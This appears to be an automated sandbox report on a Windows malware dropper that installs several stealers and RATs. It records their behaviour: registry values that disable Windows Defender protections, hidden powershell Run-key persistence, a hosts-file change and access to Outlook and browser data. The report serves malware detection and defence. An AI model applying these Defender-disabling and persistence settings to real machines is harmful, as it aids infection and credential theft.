Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-mjk5cshc85
Target 1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77
SHA256 d35fe3e38292d766814586a9a6451dbfc104893aaf1dc9b84d69a3022987794f
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d35fe3e38292d766814586a9a6451dbfc104893aaf1dc9b84d69a3022987794f

Threat Level: Known bad

The file 1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan

RedLine payload

Glupteba

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

SectopRAT

Modifies Windows Defender Real-time Protection settings

DcRat

ZGRat

Detect ZGRat V1

Glupteba payload

RedLine

Raccoon

Amadey

Raccoon Stealer payload

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Windows security modification

Loads dropped DLL

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Checks installed software on the system

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

outlook_win_path

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

outlook_office_path

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 10:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 10:29

Reported

2023-10-31 10:33

Platform

win10v2004-20231023-en

Max time kernel

154s

Max time network

163s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\953A.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5344.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\A0F4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C3FE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6915.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FBD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B85.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JH61ge1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A0F4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mU933lv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1145.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\281A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DB5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\953A.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6915.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F725.exe'\"" C:\Users\Admin\AppData\Local\Temp\F725.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\tM6SC9Xu.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\KE7RO4Oi.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
